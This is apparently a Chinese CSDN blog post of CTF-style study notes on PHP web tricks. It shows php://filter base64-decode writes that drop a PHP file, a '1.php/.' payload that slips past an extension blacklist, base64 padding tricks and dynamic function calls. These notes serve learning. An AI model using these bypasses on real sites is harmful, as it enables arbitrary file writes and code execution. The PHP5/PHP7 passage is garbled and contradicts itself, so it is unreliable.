随便学习

最新推荐文章于 2022-07-22 10:22:39 发布
最新推荐文章于 2022-07-22 10:22:39 发布
阅读量102 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43999372/article/details/89160060
版权

php伪协议写入

<?php
$filename = "php://filter/write=convert.base64-decode/resource=test.php/.";
file_put_contents($filename,"PD9waHAgcGhwaW5mbygpOz8+"); 
echo pathinfo("php://filter/write=convert.base64-decode/resource=test.php/.",PATHINFO_EXTENSION);
?>

经过测试发现一个可以再windows和linux上都行得通的方法:
在操作系统中,都是禁止使用/作为文件名的,但是不知道为什么后面加一个.就可以成功的写入1.php了。

if(!in_array(pathinfo($log_name, PATHINFO_EXTENSION), ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'], true)) {
        file_put_contents($log_name, $output);
    }

所以payload如下

log_name=1.php/.&output=<?php phpinfo();?>

base64解码的trick:解码中遇到不符合规范的字符直接跳过。其他内容并不影响base64解码。另外因为base64解码是4位4位的解的,所以我们要保证我们需要解码的字符串之前的合法字符数为4的倍数,这样就不会影响我们传入的字符串正常解码
比如

<?php phpinfo();?>
//base64如下
PD9waHAgcGhwaW5mbygpOz8+
//我们在前面加入字符lt;lt最后结果如下
lt;ltPD9waHAgcGhwaW5mbygpOz8+

在这里我们加入的合法字符为ltlt,而;为不合法字符
在这里插入图片描述
最后结果为
在这里插入图片描述

get 的一种使用方式

$AA=${_GET}{X};
ECHO $AA;

如果直接以 x x x ( ) ; 来 调 用 , P H P 5 和 P H P 7 并 无 不 同 , 如 果 以 ( xxx();来调用,PHP5和PHP7并无不同,如果以( xxx();PHP5PHP7(xxx)();的格式,在php7中,不允许通过(‘phpinfo’)();来执行动态函数,但是在PHP7以后可以通过(‘phpinfo’)();的方式来执行函数

as-root
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHPRCE
m0_63045593的博客
04-22 947
PHPRCE <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store = $store
Day50:WEB攻防-PHP应用&文件包含&LFI&RFI&伪协议编码算法&无文件利用&黑白盒
qq_61553520的博客
03-27 1019
小迪安全-Day50:WEB攻防-PHP应用&文件包含&LFI&RFI&伪协议编码算法&无文件利用&黑白盒
浅谈 filter伪协议的特性
qq_64201116的博客
07-22 2513
对我来说,我以前对filter伪协议不甚了解,这次接触了这一题,就得主动去更加深入地了解一下filter伪协议了。以前呢就知道php//filter/read=convert.base64-encode/resource=[文件名]这干瘪瘪的一套,用就完了,现在看来深入了解是很有必要的。......
详解php://filter以及死亡绕过
woshilnp的博客
05-25 1万+
详解php://filter以及死亡绕过 php://filter PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。 php:// — 访问各个输入/输出流(I/O streams) php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_ge
php://filter协议在任意文件读取漏洞中的利用二(学习总结)
L2329794714的博客
11-12 1036
一、练习题目源码 练习题目描述: 练习任务:为获取web目录下的flag信息。 index.php 接受GET 输入str,并保存在test/test.php中,但用户输入的字符前会自动添加 exit() 退出函数,使得test.php 没机会执行用户输入的shell就退出。flag信息隐藏在flag.php中,但直接访问falg.php,被不会得到flag。 #index.php 文件 <? <?php $str="<?php ...
个人学习资料自己记录随便看看
最新发布
05-20
自己看
linux学习心得.doc
12-21
学习Linux需要系统的认识和实践,而不是只是随便玩玩的系统。要真正学习Linux,需要忘记Windows的思维方式,慢慢感受和习惯Linux的操作方式。 第一步:选择一本好的入门教材 要学习Linux,首先需要选择一本好的入门...
爬虫进阶知识学习
12-22
#爬虫进阶知识点(方便温习做点笔记) ua添加 ...也可以在网上搜索ua大全,随便抄一条 本人上网上随便抄的: “”“ ‘User-Agent’ : ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53
小学生主题班会网络PPT学习教案.pptx
10-01
同时,要培养良好的网络素养,如不说脏话,不侮辱他人,不随便点击陌生链接,以防止接触不良信息或遭遇网络欺诈。此外,还提出了"网络文明公约",包括:善于利用网络学习,不看不良信息;友好交流,不侮辱欺诈他人;...
vc学习方法
04-20
vc学习方法,是我个人看啦以后自认为比较实用雨初学者的,大家随便看看吧
谈一谈php://filter的妙用
beyond__devil的博客
10-19 1万+
原文地址: https://www.leavesongs.com/PENETRATION/php-filter-magic.html 这个可能是一个大牛,大家可以看看博客去,我没看过。。。 php://filter是PHP中独有的协议,利用这个协议可以创造很多“妙用”,本文说几个有意思的点,剩下的大家自己下去体会。本来本文的思路我上半年就准备拿来做XDCTF2016的题目的,
通过php://filter/read=convert.base64-encode/resource= 利用LFI来查看源码
热门推荐
Taowood的博客
07-25 3万+
PHP LFI读php文件源码以及直接post webshell 假设如下一个场景 (1) http://vulnerable/fileincl/example1.php?page=intro.php(该php文件包含LFI漏洞) (2) 但是你没有地方可以upload你的webshell代码 (3) LFI只能读取到非php文件的源码(因为无法解析执行 只能被爆菊花) (4) 如果你能...
php filter base64,php://filter的妙用
weixin_36377516的博客
03-11 804
php://filter是PHP语言中特有的协议流,作用是作为一个“中间流”来处理其他流。比如,我们可以用如下一行代码将POST内容转换成base64编码并输出以下是2018年moctf一道 死亡退出的题查看源码:写在了最前面;说明当代码执行到这里会使代码直接退出,不会执行后续代码。所以我们要绕过这里!先来分析下后续代码: 先给$c用post方法传递一个参数 此处的@是屏蔽错误提示的意思,后 f...
ctf之php伪协议,ctf中常见的php伪协议应用
weixin_39949776的博客
03-29 637
ctf中常见的php伪协议应用0x01 知识储备php支持的协议和封装协议可以看http://php.net/manual/zh/wrappers.php,大致有12种,总结了一些真实漏洞和ctf比赛中常出现的案例,发现其中用的最多的四种是:php://、data://、zlib://、phar://三个白帽payload:php://filter/write=convert.base64-dec...
ctfshow php特性(89——150plus)
..
12-14 4690
web89 这题的逻辑是如果存在$_GET['num'],则用正则表达式匹配$num中的值,如果成功匹配则程序终止于"no no no",否则进行下一步,如果intval($num)有正确的返回值,则输出$flag。 解题思路:该题要求传入的值不能有数字,那我们的话可以利用preg_match的一个漏洞,即无法处理数组,从而进行绕过正则匹配,同时intval函数处理一个数组有正确的返回值,可以达到输出flag的目的。 payload : num[]= 或 num[]=任意..
php://filter的妙用
weixin_44255856的博客
01-30 1190
php://filter是PHP语言中特有的协议流,作用是作为一个“中间流”来处理其他流。比如,我们可以用如下一行代码将POST内容转换成base64编码并输出 查看源码:&amp;amp;lt;?php exit;?&amp;amp;gt;写在了最前面;说明当代码执行到这里会使代码直接退出,不会执行后续代码。所以我们要绕过这里! 先来分析下后续代码: 先给$c用post方法传递一个参数 此处的@是屏蔽错误提示的意思,后 ...
php://filter漏洞利用实例
AnywayC9的专栏
02-04 5580
根据php.net中的描述,http://php.net/manual/zh/wrappers.php.php。php://filter 是一种元封装器,其设计的目的是用于数据流打开时的筛选过滤应用。这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和file_get_contents(),在数据流内容读取之前没有机会应用其他过滤器。 在文件包含
php://filter技术分享
Pz_mstr's Blog
10-13 4394
0x00 前言php://filter是PHP中的一个协议,利用这个协议我们可以解决一些ctf的题目,或者挖掘出一些漏洞。0x01 php://filterphp://filter可以作为一个中间流来处理其他流,具有四个参数: 名称 描述 备注 resource=<要过滤的数据流> 指定了你要筛选过滤的数据流。 必选 read=<读链的筛选列表> 可以设定一个或多个过滤
简单记录一下MOCTF的三道web题
0verWatch的博客
03-06 3674
本人渣渣,于是记录一下 死亡退出 一道代码审计题目 &lt;?php show_source(__FILE__); $c="&lt;?php exit;?&gt;"; @$c.=$_POST['c']; @$filename=$_POST['file']; if(!isset($filename)) { ...
随便写一小段php代码
06-03
... $num1 = 10; $num2 = 20; $sum = $num1 + $num2; ...echo "The sum of $num1 and $num2 is $sum";...在该代码段中,我们首先定义了两个变量$...在实际开发中,你需要学习更多的PHP语法和函数,以便构建更复杂的应用程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值